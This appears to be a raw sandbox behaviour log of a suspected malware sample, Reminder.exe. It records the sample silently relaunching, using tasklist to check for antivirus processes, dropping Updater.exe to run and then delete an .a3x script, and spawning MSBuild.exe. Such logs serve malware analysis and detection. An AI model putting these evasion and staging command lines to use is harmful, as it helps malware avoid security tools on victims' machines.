      Source: C:\Users\user\Desktop\Reminder.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
      Source: Reminder.exeReversingLabs: Detection: 54%
      Source: C:\Users\user\Desktop\Reminder.exeFile read: C:\Users\user\Desktop\Reminder.exe
      Source: unknownProcess created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe"
      Source: C:\Users\user\Desktop\Reminder.exeProcess created: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp" /SL5="$40392,1755695,835584,C:\Users\user\Desktop\Reminder.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpProcess created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
      Source: C:\Users\user\Desktop\Reminder.exeProcess created: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp" /SL5="$6037A,1755695,835584,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
      Source: C:\Users\user\Desktop\Reminder.exeProcess created: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp" /SL5="$40392,1755695,835584,C:\Users\user\Desktop\Reminder.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess created: C:\Users\user\AppData\Local\coigned\Updater.exe "C:\Users\user\AppData\Local\coigned\\Updater.exe" "C:\Users\user\AppData\Local\coigned\\friendliwise.csv"
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpProcess created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
      Source: C:\Users\user\Desktop\Reminder.exeProcess created: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp" /SL5="$6037A,1755695,835584,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpProcess created: C:\Users\user\AppData\Local\coigned\Updater.exe "C:\Users\user\AppData\Local\coigned\\Updater.exe" "C:\Users\user\AppData\Local\coigned\\friendliwise.csv"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\ZPrVgH71.a3x && del C:\ProgramData\\ZPrVgH71.a3x
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\coigned\Updater.exe updater.exe C:\ProgramData\\ZPrVgH71.a3x
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\ZPrVgH71.a3x && del C:\ProgramData\\ZPrVgH71.a3x
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\coigned\Updater.exe updater.exe C:\ProgramData\\ZPrVgH71.a3x
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      Source: C:\Users\user\Desktop\Reminder.exeSection loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\Reminder.exeSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: version.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: winhttp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: wtsapi32.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: winsta.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: textinputframework.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: coreuicomponents.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: coremessaging.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: ntmarta.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: shfolder.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: rstrtmgr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: ncrypt.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: ntasn1.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: propsys.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: edputil.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: urlmon.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: iertutil.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: srvcli.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: netutils.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: windows.staterepositoryps.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: appresolver.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: bcp47langs.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: slc.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: userenv.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: sppc.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: onecorecommonproxystub.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Users\user\Desktop\Reminder.exeSection loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\Reminder.exeSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: version.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: winhttp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: wtsapi32.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: winsta.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: textinputframework.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: coreuicomponents.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: coremessaging.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: ntmarta.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: coremessaging.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: shfolder.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: rstrtmgr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: ncrypt.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: ntasn1.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: textshaping.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: dwmapi.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: sfc.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: sfc_os.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: explorerframe.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpSection loaded: apphelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: wsock32.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: version.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: winmm.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: wininet.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: iphlpapi.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: userenv.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: cryptsp.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: rsaenh.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: cryptbase.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: profapi.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: propsys.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: edputil.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: urlmon.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: iertutil.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: srvcli.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: netutils.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: appresolver.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: bcp47langs.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: slc.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: sppc.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: pcacli.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: sfc_os.dll
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
      Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
      Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
      Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: wsock32.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: version.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: winmm.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: wininet.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: iphlpapi.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: userenv.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dll
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
